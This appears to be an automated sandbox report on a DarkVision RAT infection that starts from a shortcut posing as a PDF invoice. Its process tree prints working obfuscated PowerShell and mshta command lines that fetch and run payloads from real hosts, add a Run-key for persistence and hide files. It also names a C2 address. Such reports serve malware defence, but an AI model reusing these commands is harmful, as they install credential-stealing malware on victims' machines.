Analysis
-
max time kernel
150s -
max time network
272s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
29-11-2024 16:01
Static task
static1
Behavioral task
behavioral1
Sample
Rechnung_2024_0092.pdf.lnk
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
Rechnung_2024_0092.pdf.lnk
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Rechnung_2024_0093.pdf.lnk
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
Rechnung_2024_0093.pdf.lnk
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
Rechnung_2024_0094.pdf.lnk
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
Rechnung_2024_0094.pdf.lnk
Resource
win10v2004-20241007-en
General
-
Target
Rechnung_2024_0092.pdf.lnk
-
Size
3KB
-
MD5
22c803dba48be47631f50a2bc486663d
-
SHA1
62061211cc2ec3c8d655e0c3217e1e0febb2a4f8
-
SHA256
7626763bffacecfaaad1880271b0ebc95b3bf961fc21a94e83341641d516adec
-
SHA512
258635b1c0428a64ad28f0f3d30d24ead81a9e4413a962c49dc5804606931b26046ca048c1e22b4116d1b7f9148e5dcf9c9c6413c06221fce446601da4826709
Malware Config
Extracted
https://pub-fee23c54ae4b464fb3904eebeb70c629.r2.dev/upgrade.hta
Extracted
darkvision
5.206.227.213
Signatures
-
DarkVision Rat
DarkVision Rat is a trojan written in C++.
-
Darkvision family
-
Blocklisted process makes network request 4 IoCs
flow pid Process 6 1028 mshta.exe 14 1028 mshta.exe 19 2136 powershell.exe 21 2136 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation KNVYINNN.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation second.exe -
Executes dropped EXE 6 IoCs
pid Process 1540 KNVYINNN.exe 324 pyexec.exe 2512 second.exe 4492 Virtual.exe 3928 pyexec.exe 3800 Virtual.exe -
Loads dropped DLL 14 IoCs
pid Process 324 pyexec.exe 4492 Virtual.exe 4492 Virtual.exe 4492 Virtual.exe 4492 Virtual.exe 4492 Virtual.exe 4492 Virtual.exe 3928 pyexec.exe 3800 Virtual.exe 3800 Virtual.exe 3800 Virtual.exe 3800 Virtual.exe 3800 Virtual.exe 628 BQE_Fast.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 BQE_Fast.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\hzQtnaa = "C:\\Users\\Admin\\AppData\\Roaming\\KNVYINNN.exe" powershell.exe -
pid Process 2136 powershell.exe 3284 powershell.exe 2136 powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 3928 set thread context of 1484 3928 pyexec.exe 93 PID 3800 set thread context of 4056 3800 Virtual.exe 106 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pyexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pyexec.exe -
Suspicious behavior: EnumeratesProcesses 16 IoCs
pid Process 3284 powershell.exe 3284 powershell.exe 2136 powershell.exe 2136 powershell.exe 324 pyexec.exe 3928 pyexec.exe 3928 pyexec.exe 4492 Virtual.exe 1484 cmd.exe 1484 cmd.exe 3800 Virtual.exe 3800 Virtual.exe 4056 cmd.exe 4056 cmd.exe 628 BQE_Fast.exe 628 BQE_Fast.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process 3928 pyexec.exe 3800 Virtual.exe 1484 cmd.exe 4056 cmd.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 3284 powershell.exe Token: SeDebugPrivilege 2136 powershell.exe -
Suspicious use of WriteProcessMemory 36 IoCs
description pid Process procid_target PID 4532 wrote to memory of 3284 4532 cmd.exe 83 PID 4532 wrote to memory of 3284 4532 cmd.exe 83 PID 3284 wrote to memory of 1028 3284 powershell.exe 84 PID 3284 wrote to memory of 1028 3284 powershell.exe 84 PID 1028 wrote to memory of 2136 1028 mshta.exe 85 PID 1028 wrote to memory of 2136 1028 mshta.exe 85 PID 2136 wrote to memory of 1540 2136 powershell.exe 87 PID 2136 wrote to memory of 1540 2136 powershell.exe 87 PID 1540 wrote to memory of 324 1540 KNVYINNN.exe 88 PID 1540 wrote to memory of 324 1540 KNVYINNN.exe 88 PID 1540 wrote to memory of 324 1540 KNVYINNN.exe 88 PID 2136 wrote to memory of 2512 2136 powershell.exe 90 PID 2136 wrote to memory of 2512 2136 powershell.exe 90 PID 2512 wrote to memory of 4492 2512 second.exe 91 PID 2512 wrote to memory of 4492 2512 second.exe 91 PID 324 wrote to memory of 3928 324 pyexec.exe 92 PID 324 wrote to memory of 3928 324 pyexec.exe 92 PID 324 wrote to memory of 3928 324 pyexec.exe 92 PID 3928 wrote to memory of 1484 3928 pyexec.exe 93 PID 3928 wrote to memory of 1484 3928 pyexec.exe 93 PID 3928 wrote to memory of 1484 3928 pyexec.exe 93 PID 3928 wrote to memory of 1484 3928 pyexec.exe 93 PID 4492 wrote to memory of 3800 4492 Virtual.exe 100 PID 4492 wrote to memory of 3800 4492 Virtual.exe 100 PID 3800 wrote to memory of 4056 3800 Virtual.exe 106 PID 3800 wrote to memory of 4056 3800 Virtual.exe 106 PID 3800 wrote to memory of 4056 3800 Virtual.exe 106 PID 3800 wrote to memory of 4056 3800 Virtual.exe 106 PID 1484 wrote to memory of 628 1484 cmd.exe 108 PID 1484 wrote to memory of 628 1484 cmd.exe 108 PID 1484 wrote to memory of 628 1484 cmd.exe 108 PID 1484 wrote to memory of 628 1484 cmd.exe 108 PID 4056 wrote to memory of 4200 4056 cmd.exe 109 PID 4056 wrote to memory of 4200 4056 cmd.exe 109 PID 4056 wrote to memory of 4200 4056 cmd.exe 109 PID 4056 wrote to memory of 4200 4056 cmd.exe 109 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 BQE_Fast.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Rechnung_2024_0092.pdf.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4532 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $W='b/hLra647502c-dA3gf.uv9e:sptM'; &(-join($W[(-251+276),(-817+822),(-322+325)])) ~* (-join($W[(-251+276),(-817+822),(-322+325)])); ~* =# (-join($W[(-91+119),(-251+276),(716-714),(781-754),(-817+822)])); foreach($U in @((-539+541),(-684+711),(-330+357),(-781+807),(278-253),(678-654),(-677+678),(-293+294),(798-772),(-104+124),(557-557),(-984+997),(912-894),(199-176),(-640+663),(-585+596),(336-320),(-872+884),(208-199),(-754+761),(535-530),(803-780),(-277+284),(-543+543),(185-178),(-460+466),(-965+972),(764-746),(-246+246),(-517+533),(-405+427),(-234+244),(-900+907),(417-394),(-84+107),(-470+470),(-739+762),(-323+323),(788-780),(469-459),(436-424),(-858+864),(858-847),(450-428),(-309+328),(107-103),(744-733),(-529+548),(-382+396),(-437+460),(439-418),(-358+359),(-556+576),(-175+201),(-763+780),(-704+708),(141-136),(912-898),(-592+615),(-757+776),(128-126),(261-234),(890-885))){$O+=$W[$U]}; =# $O;2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3284 -
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" https://pub-fee23c54ae4b464fb3904eebeb70c629.r2.dev/upgrade.hta3⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1028 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function gCKawp($xqETuHkBN, $cgpVK){[IO.File]::WriteAllBytes($xqETuHkBN, $cgpVK)};function TPUUAPTRh($xqETuHkBN){if($xqETuHkBN.EndsWith((odPEDz @(47359,47413,47421,47421))) -eq $True){Start-Process (odPEDz @(47427,47430,47423,47413,47421,47421,47364,47363,47359,47414,47433,47414)) $xqETuHkBN}else{Start-Process $xqETuHkBN}};function IogZmN($xqETuHkBN, $fYoQizCPx){[Microsoft.Win32.Registry]::SetValue((odPEDz @(47385,47388,47382,47402,47408,47380,47398,47395,47395,47382,47391,47397,47408,47398,47396,47382,47395,47405,47396,47424,47415,47429,47432,47410,47427,47414,47405,47390,47418,47412,47427,47424,47428,47424,47415,47429,47405,47400,47418,47423,47413,47424,47432,47428,47405,47380,47430,47427,47427,47414,47423,47429,47399,47414,47427,47428,47418,47424,47423,47405,47395,47430,47423)), $fYoQizCPx, $xqETuHkBN)};function MCNjOTFH($xqETuHkBN){$IVMCWJwi=(odPEDz @(47385,47418,47413,47413,47414,47423));$VGLgiVJ=(Get-ChildItem $xqETuHkBN -Force);$VGLgiVJ.Attributes=$VGLgiVJ.Attributes -bor ([IO.FileAttributes]$IVMCWJwi).value__};function oBvvmAnE($iXTtDfK){$GzBKYX = New-Object (odPEDz @(47391,47414,47429,47359,47400,47414,47411,47380,47421,47418,47414,47423,47429));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$cgpVK = $GzBKYX.DownloadData($iXTtDfK);return $cgpVK};function odPEDz($rGehVsA){$jtBdpZ=47313;$YWQUeqd=$Null;foreach($qyPsd in $rGehVsA){$YWQUeqd+=[char]($qyPsd-$jtBdpZ)};return $YWQUeqd};function WmSEp(){$lEPJgGls = $env:APPDATA + '\';$SCATfjY = oBvvmAnE (odPEDz @(47417,47429,47429,47425,47428,47371,47360,47360,47425,47430,47411,47358,47414,47362,47415,47412,47413,47410,47413,47369,47363,47368,47367,47413,47365,47368,47413,47415,47410,47413,47364,47415,47369,47363,47415,47366,47370,47364,47367,47411,47370,47412,47366,47364,47359,47427,47363,47359,47413,47414,47431,47360,47388,47391,47399,47402,47386,47391,47391,47391,47359,47414,47433,47414));$VQrLt = $lEPJgGls + 'KNVYINNN.exe';gCKawp $VQrLt $SCATfjY;TPUUAPTRh $VQrLt;$fYoQizCPx = 'hzQtnaa';IogZmN $VQrLt $fYoQizCPx;;$MfdAL = oBvvmAnE (odPEDz @(47417,47429,47429,47425,47428,47371,47360,47360,47425,47430,47411,47358,47412,47366,47410,47362,47369,47414,47411,47368,47367,47414,47361,47364,47365,47413,47369,47369,47369,47370,47370,47414,47362,47415,47365,47365,47415,47369,47366,47370,47410,47369,47365,47370,47359,47427,47363,47359,47413,47414,47431,47360,47428,47414,47412,47424,47423,47413,47359,47414,47433,47414));$NtudOlR = $lEPJgGls + 'second.exe';gCKawp $NtudOlR $MfdAL;TPUUAPTRh $NtudOlR;MCNjOTFH $NtudOlR;;;}WmSEp;4⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2136 -
C:\Users\Admin\AppData\Roaming\KNVYINNN.exe"C:\Users\Admin\AppData\Roaming\KNVYINNN.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1540 -
C:\Users\Admin\pyexec.exe"C:\Users\Admin\pyexec.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:324 -
C:\Users\Admin\AppData\Roaming\AltDaemon\pyexec.exeC:\Users\Admin\AppData\Roaming\AltDaemon\pyexec.exe7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:3928 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe8⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1484 -
C:\Users\Admin\AppData\Local\Temp\BQE_Fast.exeC:\Users\Admin\AppData\Local\Temp\BQE_Fast.exe9⤵
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- outlook_office_path
PID:628
-
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\second.exe"C:\Users\Admin\AppData\Roaming\second.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2512 -
C:\Users\Admin\Virtual.exe"C:\Users\Admin\Virtual.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4492 -
C:\Users\Admin\AppData\Roaming\RemoteSvc\Virtual.exeC:\Users\Admin\AppData\Roaming\RemoteSvc\Virtual.exe7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:3800 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe8⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4056 -
C:\Windows\explorer.exeC:\Windows\explorer.exe9⤵PID:4200
-
-
-
-
-
-
-
-
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:396
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
2Credentials In Files
1Credentials in Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD575b4b2eecda41cec059c973abb1114c0
SHA111dadf4817ead21b0340ce529ee9bbd7f0422668
SHA2565540f4ea6d18b1aa94a3349652133a4f6641d456757499b7ab12e7ee8f396134
SHA51287feaf17bd331ed6afd9079fefb1d8f5d3911ababf8ea7542be16c946301a7172a5dc46d249b2192376957468d75bf1c99752529ca77ec0aa78a8d054b3a6626
-
Filesize
5.5MB
MD5afe01172470b022d6246962aa17ffe2a
SHA1bcb74df02f14ec037a0c73071e659f443909ee44
SHA2563e14e459df569d5302f499b3fbaa839ddaa214de852d9ef8d85e4e6f386b06ef
SHA512638c3ed2d8e5ecfcdad89e040b9c7a58742aabc4490d66ff961c22719b3494fe41079d7979d49f96bb71b3af335366cdd27672cd554befd4d9b90ead8a425bf3
-
Filesize
2.3MB
MD5967f4470627f823f4d7981e511c9824f
SHA1416501b096df80ddc49f4144c3832cf2cadb9cb2
SHA256b22bf1210b5fd173a210ebfa9092390aa0513c41e1914cbe161eb547f049ef91
SHA5128883ead428c9d4b415046de9f8398aa1f65ae81fe7945a840c822620e18f6f9930cce2e10acff3b5da8b9c817ade3dabc1de576cbd255087267f77341900a41c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1.1MB
MD5bdae2c5c482611c575e085c5e82bdc22
SHA16ce042dc100769150dc289e8a5cff52dad80010d
SHA256982a860b06278471b1a059d0b50606d9446632b6bc43f83f60293ef0122b5257
SHA512459e2258cf4dc2b8e8065d54a35392f7017b5e8ca1daa7f4e76718edcb619fbc63dad01375939e11ee2fe2975c0a20fcdb55e3fd82bc36b8350b3f6c05a26398
-
Filesize
6.1MB
MD5e06afcdb16d22bd45bc3a5b01c96da3a
SHA1a0f776c4c64a808676082449f23858257f1aa132
SHA2565665bb7e9557ec139e0a60fd43b8775fb9bb764db581e7e2278c83b1f2c3c358
SHA51213beb7a8aa1aae7f182cdc0215d56feac1f04532dce6d1fddc358d422e571616f2fcea569bf6f1a8dcdc5733780938b4f82681e24290338852e6e37102741e33
-
Filesize
4.0MB
MD547cb10ebf122aea1d817c5b57737c2fc
SHA1074b2f5ab20d09dcf7c0c8701568fc3654a47303
SHA25654be46f3daaad32f18eb85dae280b3ca6f81c640dd9531ed16b71817a3a2973c
SHA512c8237bfb26a625eaeafe36dc0277626735da1f2dbf33208374a28ce08c52b97cb2c087b85bd227d6cc7b7541743c28d674415031ee600853056af393ead26ecb
-
Filesize
2.5MB
MD522ac09892f3706c6660d1ffe3387c07a
SHA106e0f1ea9958b338598d0b1378918e4efca773b8
SHA2562e158dfbcf37e16d4b0d73d59f5d583a733a12c7cfed243a76b2de2fc9defbf7
SHA5124e40e904e680fd861bbb782c4b790c3b290e612e8fc196ab520b1ab7de53e696df316d45968f744ddf218ce04ca06ae2ae1cbf8b6b8cab9c04c980ca32befeb0
-
Filesize
371KB
MD5496df6ad1a158ed5037138e397713ef0
SHA1287bd2219c955687baa399ded57e9ab64334c63c
SHA25607c04290f53aaaaa7df6b6ea3a53103b6e3ef8ff658d8097617a9c48dfc6e90a
SHA512422da26a8f50c1f02c1cc7c4bed37cdb33732039bba82f32c2a14baa8c6a7bc5544856ab26a2071b5ea8e731a296e2c69071da2f067312d05763aa3a9928bb3a
-
Filesize
4.0MB
MD51ed9d695fd31239e2b16e3712f96965f
SHA1acb9c07dedc5cd9fe5632ab92f77f0bd046d2bb2
SHA256414c538d3884da4a5737f0fab8834333dc520e50c230d9e08cc40832806a0730
SHA5122e3d8326b8e38b4d2babf6c69fe552f3f58c8672fac269ecdd1f9a90fde3b0917971bcb79b0fa46d4353dadd93a482b60d8f02b3065fe907b5a6067202a5333c
-
Filesize
3.4MB
MD5c8a2de7077f97d4bce1a44317b49ef41
SHA16cb3212ec9be08cb5a29bf8d37e9ca845efc18c9
SHA256448402c129a721812fa1c5f279f5ca906b9c8bbca652a91655d144d20ce5e6b4
SHA5129815eba1566a8e33734f6a218071ec501dd1f799b1535e25d87c2b416b928ae8d15f8218cf20e685f9907ec39c202cbfc4728fe6ab9d87b3de345109f626845e
-
Filesize
4.4MB
MD5e70ee3bca802db0197b2632b0f2ab4db
SHA1aa7e9665baaa4a2c487dd5d1059b2cb2cdcae8e3
SHA2560cbf2430f07b5bdef2633605e0a65ed68ac1b3dbf3ae5bb8b79695f40a48aefd
SHA512e93c763eff21a05c8d283a07ea9a6a357fa92394f2da35e75f3796e8ca94f9f220811ead59b5d562a7f20a6e2caa459a20dc8076a749d81628253dcba1fe1709
-
Filesize
783KB
MD572381196433e3385bb4be8ff422800ef
SHA1d81bc8d8036ef92e7f24228618350e77827f314d
SHA256bf7db4b113588c19dc13603024ecf3d90bb8eb3854ad00fad883a74e001a341a
SHA51238d2c4821c147d47381c15aacb76b577aee9fab81329b71be0b965ce31ab76b26cbb683d919b033aa79594aabc0401ce5d336de537724cfadc9ccbbfbfc5a678
-
Filesize
22KB
MD59078f84220e8b7379bfa2f4333995bc1
SHA121f0cbeffdcd99bce6521aadead7aa6f68edd666
SHA256b7c4fec4464e43a5736bf764f137f9aee03c7e0d67755d964ab74854bc725f8f
SHA51245dd6188e3085d34e632091068f9d7c31d22e2643a20fb1a01c1c255f593e71fa2aeb34fd85d22dfacfbbdf7a1d69750206745215ee77d01a759ada9849be090
-
Filesize
593KB
MD5d029339c0f59cf662094eddf8c42b2b5
SHA1a0b6de44255ce7bfade9a5b559dd04f2972bfdc8
SHA256934d882efd3c0f3f1efbc238ef87708f3879f5bb456d30af62f3368d58b6aa4c
SHA512021d9af52e68cb7a3b0042d9ed6c9418552ee16df966f9ccedd458567c47d70471cb8851a69d3982d64571369664faeeae3be90e2e88a909005b9cdb73679c82
-
Filesize
809KB
MD5366fd6f3a451351b5df2d7c4ecf4c73a
SHA150db750522b9630757f91b53df377fd4ed4e2d66
SHA256ae3cb6c6afba9a4aa5c85f66023c35338ca579b30326dd02918f9d55259503d5
SHA5122de764772b68a85204b7435c87e9409d753c2196cf5b2f46e7796c99a33943e167f62a92e8753eaa184cd81fb14361e83228eb1b474e0c3349ed387ec93e6130
-
Filesize
638KB
MD511d49148a302de4104ded6a92b78b0ed
SHA1fd58a091b39ed52611ade20a782ef58ac33012af
SHA256ceb0947d898bc2a55a50f092f5ed3f7be64ac1cd4661022eefd3edd4029213b0
SHA512fdc43b3ee38f7beb2375c953a29db8bcf66b73b78ccc04b147e26108f3b650c0a431b276853bb8e08167d34a8cc9c6b7918daef9ebc0a4833b1534c5afac75e4
-
Filesize
28KB
MD5b6f6c3c38568ee26f1ac70411a822405
SHA15b94d0adac4df2d7179c378750c4e3417231125f
SHA256a73454c7fad23a80a3f6540afdb64fc334980a11402569f1986aa39995ae496d
SHA5125c0a5e9a623a942aff9d58d6e7a23b7d2bba6a4155824aa8bb94dbd069a8c15c00df48f12224622efcd5042b6847c8fb476c43390e9e576c42efc22e3c02a122
-
Filesize
17KB
MD5d00b94674f06f45b8315ccf49d3a383b
SHA1465cccf79a1b7ab9d973db70c3a253e4a066aa6b
SHA256fc2ebd32f984ec563113d6759db21d1ff4394da6bc0c688c9165d1d2e60fadcd
SHA51263768752a2406baf517f675b6130798d55f16731152491f4c99c0d39aab394eb96a67410875bc947685125bce611fc50b021b9a2935d491be62b3f75e9bb70f6